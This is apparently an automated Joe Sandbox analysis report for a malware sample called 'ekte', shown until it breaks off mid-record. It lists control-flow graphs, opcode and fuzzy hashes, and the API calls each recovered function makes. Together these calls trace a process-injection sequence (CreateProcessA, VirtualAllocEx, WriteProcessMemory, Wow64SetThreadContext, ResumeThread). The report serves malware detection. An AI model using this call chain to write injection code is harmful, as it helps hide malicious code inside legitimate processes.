                                                                                                    control_flow_graph 99 1bf3f5-1bf499 101 1bf49b-1bf4b2 99->101 102 1bf4e2-1bf50a 99->102 101->102 107 1bf4b4-1bf4b9 101->107 105 1bf50c-1bf520 102->105 106 1bf550-1bf5a6 102->106 105->106 117 1bf522-1bf527 105->117 115 1bf5a8-1bf5bc 106->115 116 1bf5ec-1bf6e3 CreateProcessA 106->116 108 1bf4bb-1bf4c5 107->108 109 1bf4dc-1bf4df 107->109 110 1bf4c9-1bf4d8 108->110 111 1bf4c7 108->111 109->102 110->110 114 1bf4da 110->114 111->110 114->109 115->116 124 1bf5be-1bf5c3 115->124 135 1bf6ec-1bf7d1 116->135 136 1bf6e5-1bf6eb 116->136 118 1bf54a-1bf54d 117->118 119 1bf529-1bf533 117->119 118->106 121 1bf537-1bf546 119->121 122 1bf535 119->122 121->121 125 1bf548 121->125 122->121 127 1bf5e6-1bf5e9 124->127 128 1bf5c5-1bf5cf 124->128 125->118 127->116 129 1bf5d3-1bf5e2 128->129 130 1bf5d1 128->130 129->129 132 1bf5e4 129->132 130->129 132->127 148 1bf7d3-1bf7d7 135->148 149 1bf7e1-1bf7e5 135->149 136->135 148->149 150 1bf7d9 148->150 151 1bf7e7-1bf7eb 149->151 152 1bf7f5-1bf7f9 149->152 150->149 151->152 153 1bf7ed 151->153 154 1bf7fb-1bf7ff 152->154 155 1bf809-1bf80d 152->155 153->152 154->155 156 1bf801 154->156 157 1bf80f-1bf838 155->157 158 1bf843-1bf84e 155->158 156->155 157->158 161 1bf84f 158->161 161->161
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BF6C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 39698a4b3b201f4ad5064fe65f0128699aea54ee9416e6b9dde9e90f823bfc53
                                                                                                    • Instruction ID: 835c6b9d1b1f2bbe99c7090fc0ce83103e042c4f1ccd28471e8836a3c66757cf
                                                                                                    • Opcode Fuzzy Hash: 39698a4b3b201f4ad5064fe65f0128699aea54ee9416e6b9dde9e90f823bfc53
                                                                                                    • Instruction Fuzzy Hash: 34C1F371D002698FDF24CFA4CC45BEEBBB1BB49300F1091AAD459B7290DB749A86CF95
                                                                                                    Function 001BF400 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 163 1bf400-1bf499 165 1bf49b-1bf4b2 163->165 166 1bf4e2-1bf50a 163->166 165->166 171 1bf4b4-1bf4b9 165->171 169 1bf50c-1bf520 166->169 170 1bf550-1bf5a6 166->170 169->170 181 1bf522-1bf527 169->181 179 1bf5a8-1bf5bc 170->179 180 1bf5ec-1bf6e3 CreateProcessA 170->180 172 1bf4bb-1bf4c5 171->172 173 1bf4dc-1bf4df 171->173 174 1bf4c9-1bf4d8 172->174 175 1bf4c7 172->175 173->166 174->174 178 1bf4da 174->178 175->174 178->173 179->180 188 1bf5be-1bf5c3 179->188 199 1bf6ec-1bf7d1 180->199 200 1bf6e5-1bf6eb 180->200 182 1bf54a-1bf54d 181->182 183 1bf529-1bf533 181->183 182->170 185 1bf537-1bf546 183->185 186 1bf535 183->186 185->185 189 1bf548 185->189 186->185 191 1bf5e6-1bf5e9 188->191 192 1bf5c5-1bf5cf 188->192 189->182 191->180 193 1bf5d3-1bf5e2 192->193 194 1bf5d1 192->194 193->193 196 1bf5e4 193->196 194->193 196->191 212 1bf7d3-1bf7d7 199->212 213 1bf7e1-1bf7e5 199->213 200->199 212->213 214 1bf7d9 212->214 215 1bf7e7-1bf7eb 213->215 216 1bf7f5-1bf7f9 213->216 214->213 215->216 217 1bf7ed 215->217 218 1bf7fb-1bf7ff 216->218 219 1bf809-1bf80d 216->219 217->216 218->219 220 1bf801 218->220 221 1bf80f-1bf838 219->221 222 1bf843-1bf84e 219->222 220->219 221->222 225 1bf84f 222->225 225->225
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BF6C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 0ddcdf699afe5821827c09cad52a5a669edeb32f5177374d6df38424b88a5453
                                                                                                    • Instruction ID: a996b4b46931d4c9486c1ae28d4d0fb18260bf0d0e49de50c9bfbdcb01b5ffa4
                                                                                                    • Opcode Fuzzy Hash: 0ddcdf699afe5821827c09cad52a5a669edeb32f5177374d6df38424b88a5453
                                                                                                    • Instruction Fuzzy Hash: 2CC1F571D002198FDF24CFA4CC45BEEBBB1BB49300F1091AAD459B7290DB749A86CF95
                                                                                                    Function 001BF061 Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 227 1bf061-1bf0d3 229 1bf0ea-1bf151 WriteProcessMemory 227->229 230 1bf0d5-1bf0e7 227->230 232 1bf15a-1bf1ac 229->232 233 1bf153-1bf159 229->233 230->229 233->232
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF13B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 7e060d47f8a64911789ef941bf3fe766c4d2633fec528d439cd24b87fde0cc60
                                                                                                    • Instruction ID: 0b1824437903ae35ddccd46e9ad2ef3879a40ceb5538fce1966992397303fb3e
                                                                                                    • Opcode Fuzzy Hash: 7e060d47f8a64911789ef941bf3fe766c4d2633fec528d439cd24b87fde0cc60
                                                                                                    • Instruction Fuzzy Hash: 6C419AB5D012589FCF00CFA9D984AEEFBB1BF49310F24942AE815B7250D335AA46CF64
                                                                                                    Function 001BF068 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 238 1bf068-1bf0d3 240 1bf0ea-1bf151 WriteProcessMemory 238->240 241 1bf0d5-1bf0e7 238->241 243 1bf15a-1bf1ac 240->243 244 1bf153-1bf159 240->244 241->240 244->243
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF13B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: ad2c5c97fdce495d8513ccd8684b3320c1c4095f086c63916f2faaf6ed9fed1d
                                                                                                    • Instruction ID: 5de494502a8c2d7bda083010d44776311e6efb60e0e3918bf69688190b1723e8
                                                                                                    • Opcode Fuzzy Hash: ad2c5c97fdce495d8513ccd8684b3320c1c4095f086c63916f2faaf6ed9fed1d
                                                                                                    • Instruction Fuzzy Hash: 49419BB5D012589FDF00CFA9D984AEEFBB1BF49310F24942AE814B7250D335AA46CF64
                                                                                                    Function 001BF1C0 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 249 1bf1c0-1bf290 ReadProcessMemory 252 1bf299-1bf2eb 249->252 253 1bf292-1bf298 249->253 253->252
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF27A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: cefa33ca5934f312cef9cfbfd3ce4e683970d02b88e419032b3c8baf14d1d23d
                                                                                                    • Instruction ID: b45f4438ce771b48ba292d0338b2a82ac3b4c4deeada8d4a9d6f7a726b1ddacf
                                                                                                    • Opcode Fuzzy Hash: cefa33ca5934f312cef9cfbfd3ce4e683970d02b88e419032b3c8baf14d1d23d
                                                                                                    • Instruction Fuzzy Hash: 4741ADB8D002589FCF10CFA9D884AEEFBB1BF49310F20942AE815B7250D375AA56CF55
                                                                                                    Function 001BF1C8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 258 1bf1c8-1bf290 ReadProcessMemory 261 1bf299-1bf2eb 258->261 262 1bf292-1bf298 258->262 262->261
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF27A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 3cf6a8cdd5d507e2c554f597d17903b2ebe98149c62619b922eb44df1ea053fa
                                                                                                    • Instruction ID: 72fc1820dc0db89b085e067c0919cf8bed769d99d276f46ffde2b8234898ada2
                                                                                                    • Opcode Fuzzy Hash: 3cf6a8cdd5d507e2c554f597d17903b2ebe98149c62619b922eb44df1ea053fa
                                                                                                    • Instruction Fuzzy Hash: 2E41ACB9D002589FCF10CFA9D884AEEFBB1BF49310F10942AE814B7250D735AA46CF65
                                                                                                    Function 001BEF38 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 267 1bef38-1bf000 VirtualAllocEx 270 1bf009-1bf053 267->270 271 1bf002-1bf008 267->271 271->270
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001BEFEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 8fb91936fba59a73e3c2883bd69b5b4071123d1998eb4d2c5d7939cea5fe5c19
                                                                                                    • Instruction ID: f7200a528b4f18c57650b18054962f03e1c7a8c64fe7aa57087d3553bbd9bfd9
                                                                                                    • Opcode Fuzzy Hash: 8fb91936fba59a73e3c2883bd69b5b4071123d1998eb4d2c5d7939cea5fe5c19
                                                                                                    • Instruction Fuzzy Hash: B041ABB8D002589FCF14CFA9D884AEEFBB1BF49310F20902AE815B7210D735A906CF55
                                                                                                    Function 001BEF40 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 276 1bef40-1bf000 VirtualAllocEx 279 1bf009-1bf053 276->279 280 1bf002-1bf008 276->280 280->279
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001BEFEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 8042a4ebc98c105e1b7b2b1fd6b97b69d3fadd920713db679286100d56aba367
                                                                                                    • Instruction ID: 495b72ddb01c31c940faa84a591fab50bd001eb4ce5ce8f2fae15f9d55312c66
                                                                                                    • Opcode Fuzzy Hash: 8042a4ebc98c105e1b7b2b1fd6b97b69d3fadd920713db679286100d56aba367
                                                                                                    • Instruction Fuzzy Hash: 37419BB4D002589FCF10CFA9D984AEEFBB5BF49310F20942AE814B7210D735A946CF55
                                                                                                    Function 001BE598 Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 285 1be598-1be600 287 1be602-1be614 285->287 288 1be617-1be665 Wow64SetThreadContext 285->288 287->288 290 1be66e-1be6ba 288->290 291 1be667-1be66d 288->291 291->290
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BE64F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: a964e59c7f8b3865c14aa56f4a31ce2b57060d759414c6f4983fc10ecf44488e
                                                                                                    • Instruction ID: 945af2e8ac7c64e870c67517012afe5477d3b4ecc21697a37ad86c44430deda9
                                                                                                    • Opcode Fuzzy Hash: a964e59c7f8b3865c14aa56f4a31ce2b57060d759414c6f4983fc10ecf44488e
                                                                                                    • Instruction Fuzzy Hash: 5141BEB4D002589FDF14CFA9D484AEEBBF1AF89310F24902AE418B7250D779AA49CF54
                                                                                                    Function 001BE5A0 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 296 1be5a0-1be600 298 1be602-1be614 296->298 299 1be617-1be665 Wow64SetThreadContext 296->299 298->299 301 1be66e-1be6ba 299->301 302 1be667-1be66d 299->302 302->301
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BE64F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 362e76a6a84d4c3e1b198100086242eb781397c26b794e54b87c2b3acb1aed1b
                                                                                                    • Instruction ID: fbf9a39d7c1037e08d16da71a5611f117d6770c4c561421c58366dcd7732d5d0
                                                                                                    • Opcode Fuzzy Hash: 362e76a6a84d4c3e1b198100086242eb781397c26b794e54b87c2b3acb1aed1b
                                                                                                    • Instruction Fuzzy Hash: 9241ACB4D002589FDB14CFA9D984AEEFBF1AF89314F24902AE418B7240D739AA45CF54
                                                                                                    Function 001BE4A8 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 307 1be4a8-1be544 ResumeThread 310 1be54d-1be58f 307->310 311 1be546-1be54c 307->311 311->310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 7e5bc4208f3375fec6f030148fd0914ab71056c94e10b470aefe350ec272a3e9
                                                                                                    • Instruction ID: 2428f67b582dc6576d059a5c289b586cad563935c11595d528a3a700f5b84f9f
                                                                                                    • Opcode Fuzzy Hash: 7e5bc4208f3375fec6f030148fd0914ab71056c94e10b470aefe350ec272a3e9
                                                                                                    • Instruction Fuzzy Hash: E031DDB5D002189FDF14CFA9E884AEEFBB1EF89314F24941AE815B7210D735A906CF94
                                                                                                    Function 001BE4B0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 316 1be4b0-1be544 ResumeThread 319 1be54d-1be58f 316->319 320 1be546-1be54c 316->320 320->319
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 20111cb1dcbeb11a7272feeb11fa5d6be6d628a971c47e8f53d35dd9e0d8efd5
                                                                                                    • Instruction ID: 6371136c7e1035915f86ab13e651ec21ae1f2007e7170f194343d96c893602fc
                                                                                                    • Opcode Fuzzy Hash: 20111cb1dcbeb11a7272feeb11fa5d6be6d628a971c47e8f53d35dd9e0d8efd5
                                                                                                    • Instruction Fuzzy Hash: EB31BCB4D002189FDF14CFA9D884AEEFBB5AF89314F24941AE815B7310D735A945CF94
                                                                                                    Function 00CA193E Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 380 ca193e-ca193f 381 ca18cc-ca18f0 380->381 382 ca1941-ca195d 380->382 385 ca18f2 381->385 386 ca18f7-ca1916 381->386 383 ca195f 382->383 384 ca1964-ca1990 382->384 383->384 387 ca1b33-ca1b4e 384->387 385->386 436 ca1919 call ca1f1a 386->436 437 ca1919 call ca1fba 386->437 438 ca1919 call ca21e9 386->438 439 ca1919 call ca205c 386->439 440 ca1919 call ca20e3 386->440 441 ca1919 call ca1cf0 386->441 442 ca1919 call ca2020 386->442 443 ca1919 call ca2196 386->443 444 ca1919 call ca1d77 386->444 445 ca1919 call ca1cd4 386->445 399 ca1af3 387->399 400 ca1ad4-ca1add 387->400 391 ca191f-ca1920 401 ca1af6-ca1afa call ca0ca8 399->401 402 ca1adf-ca1ae2 400->402 403 ca1ae4-ca1ae7 400->403 408 ca1a3f-ca1a45 401->408 409 ca1995-ca199a 401->409 405 ca1af1 402->405 403->405 405->401 408->409 410 ca1a6b-ca1a6f 409->410 411 ca19a0-ca19a1 409->411 412 ca1a71-ca1a74 410->412 413 ca1a75-ca1a83 410->413 411->410 412->413 415 ca1b8d-ca1b91 413->415 416 ca1a5b-ca1a69 415->416 417 ca1b97-ca1b98 415->417 421 ca19c0-ca19ce 416->421 422 ca1a54-ca1a55 416->422 419 ca1b59-ca1b87 417->419 419->415 426 ca19ac-ca1b2d 421->426 427 ca19b3-ca1b53 421->427 422->421 426->387 427->419 436->391 437->391 438->391 439->391 440->391 441->391 442->391 443->391 444->391 445->391
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: G4MJ
                                                                                                    • API String ID: 0-3610995474
                                                                                                    • Opcode ID: c8f50815be6ca4f169d99d76cd529990701eecb21a7688546ee7bd7d89928d40
                                                                                                    • Instruction ID: 372da6383ea226fae0f2f2b118919e502f08b9c3ed4483a0936bb9078cd2a082
                                                                                                    • Opcode Fuzzy Hash: c8f50815be6ca4f169d99d76cd529990701eecb21a7688546ee7bd7d89928d40
                                                                                                    • Instruction Fuzzy Hash: 76813374E0A209CFDF14CFAAD9546EEBBF5AB4A304F28912AD819B7391D7340A45DF10
                                                                                                    Function 00CA0D85 Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a213a56d56dbf092a0584e6e816f79b221aff175cf140c3fa69d957685b704ca
                                                                                                    • Instruction ID: d783dd88c542d56152d57f44b632add89cb57c3a5c9d2d589a2c71fa061a9289
                                                                                                    • Opcode Fuzzy Hash: a213a56d56dbf092a0584e6e816f79b221aff175cf140c3fa69d957685b704ca
                                                                                                    • Instruction Fuzzy Hash: 0151BE74E042098FDF04DFE5D9546ADBBB2FF8A300F208229E81AAB355DB305942DF51
                                                                                                    Function 00CA0D1E Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: de4f1ad894a9ad472ada60896b58fc96659f54057526b2677dfd2bad3662d659
                                                                                                    • Instruction ID: 005aa0740e05f9714e0431aa90ca2df929bead7b3230d861f10708a9aeea2496
                                                                                                    • Opcode Fuzzy Hash: de4f1ad894a9ad472ada60896b58fc96659f54057526b2677dfd2bad3662d659
                                                                                                    • Instruction Fuzzy Hash: CF419F74E042098FDF04DFE4D954AAEBBB2EF8A300F208229D819BB355DB345941DF51
                                                                                                    Function 00CA1CF0 Relevance: .1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47d8078a3277f167ce9c71a5455d1a6fde963ce16a9bef0747855c8eec094550
                                                                                                    • Instruction ID: 349a306e3f5519cfa5d215c1798b827df97b323c812745c23b925060c1e39c8a
                                                                                                    • Opcode Fuzzy Hash: 47d8078a3277f167ce9c71a5455d1a6fde963ce16a9bef0747855c8eec094550
                                                                                                    • Instruction Fuzzy Hash: AB413771D4522ACBDB20CF65CC40BE8B7B5BF8A314F2492EAD509A7251EB705AC5DF40
                                                                                                    Function 00CA0541 Relevance: .1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 766d8f4b09d2a5f3e7e38186c52f6842613f2612b5bd3f4caf0c55b0a6aaca6a
                                                                                                    • Instruction ID: b60e7aa4866ae3611c7dbdebf66793e4b11a85e71ed65b42f8831b6a92c504b2
                                                                                                    • Opcode Fuzzy Hash: 766d8f4b09d2a5f3e7e38186c52f6842613f2612b5bd3f4caf0c55b0a6aaca6a
                                                                                                    • Instruction Fuzzy Hash: 1521AF30D09204CBCB04DFA5D9445EDBBB9EF8F351F24A129D40AB3661DB300806DF29
                                                                                                    Function 0015D564 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.370913574.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_15d000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4a73a75d79428266ac2702fc9e34435fcf63c2d32731ba134599589d03379d8
                                                                                                    • Instruction ID: 4d5c74e1a20786a46a1ead8429eb18799be27beeda861a45273cb28250de3c77
                                                                                                    • Opcode Fuzzy Hash: b4a73a75d79428266ac2702fc9e34435fcf63c2d32731ba134599589d03379d8
                                                                                                    • Instruction Fuzzy Hash: 5121C175504240EFEB25CF50E8C4B26BB75EB88315F248569EC094F246C336D95ADBA1
                                                                                                    Function 0016D39C Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.370977757.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_16d000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c553ad4c34a1620671f70cbb9a20534b87aad82a2d078f72a8f2e1aa769440ad
                                                                                                    • Instruction ID: c2b029eb366e667a3615639db3e5e9890f900731b35a13c86dc5e468bb9797d3
                                                                                                    • Opcode Fuzzy Hash: c553ad4c34a1620671f70cbb9a20534b87aad82a2d078f72a8f2e1aa769440ad
                                                                                                    • Instruction Fuzzy Hash: 0121B0B5A04240EFDB04CF14E9C4B26BBA5EB84314F24C569D8094B686C736E866DBA2
                                                                                                    Function 0016D1E4 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.370977757.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_16d000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: da136d5ac0651401ee70702405fc2f09410d66bc0c506f48b91f3e63b9871bd5
                                                                                                    • Instruction ID: 80c95d2ebd8522b49778221a33b34df7c4fead3cc7c1b1b1e0adc7c7786f4243
                                                                                                    • Opcode Fuzzy Hash: da136d5ac0651401ee70702405fc2f09410d66bc0c506f48b91f3e63b9871bd5
                                                                                                    • Instruction Fuzzy Hash: 1721D075A04240AFDB05CF50E8D4B26BBA5EB84314F20C5ADE8494B242C376D866DBA1
                                                                                                    Function 00CA0550 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
